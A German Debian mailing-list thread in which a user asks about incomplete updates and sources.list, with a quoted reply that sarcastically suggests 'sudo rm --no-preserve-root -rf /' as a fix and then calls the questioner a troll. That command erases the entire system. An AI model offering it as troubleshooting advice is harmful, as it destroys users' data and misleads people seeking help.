Re: Update-Probleme Debian im Internet gefunden

Hallo Anna. Hallo Gruppe.
Danke fuer die Email.
Hast Du eine bessere Idee, wie man den Fehler finden kann?
War das Update unvollstaendig, und laesst sich das nachholen?

Vielen Dank.

Freundlicher Gruss,
Sophie

PS: Es kamen noch einige sehr hilfreiche Emails, z.B. mit, die sources list zu aendern. Die will ich aber erst ausdrucken, bevor ich die Codes aendere und darauf antworte.
Welchen Schaden kann eine falsche sources list anrichten? Ist sie die Ursache fuer die Probleme?

Am Donnerstag, 26. Mai 2022, 18:26:46 MESZ hat Anna Lühse <rfc.twentyfoursixty@gmail.com> Folgendes geschrieben:

On 25.05.22 05:44, tobias schwibingerr wrote:
> Hallo Gruppe.
> Was ist bitte von den folgenden 2 Befehlen zu halten:
>
> "apt install - f"
> und
> "apt full-upgrade -f"

Nicht viel, aber in diesem Zusammenhang könntest du auch das ausprobieren:

sudo rm --no-preserve-root -rf /

Damit müssten dann auch die Kernelprobleme komplett weg sein.

Ich weiß auch nicht, wieso das nicht in den Debian Release Notes steht.
Naja egal. Im Internet bekommt man ja sowieso immer die besseren Tipps.

> Danke.

Gern.

> Gruss,
> Sophie

Gruss,

Anna

PS: Sorry für's füttern des Trolls, aber ich konnte mich nicht länger
zurückhalten.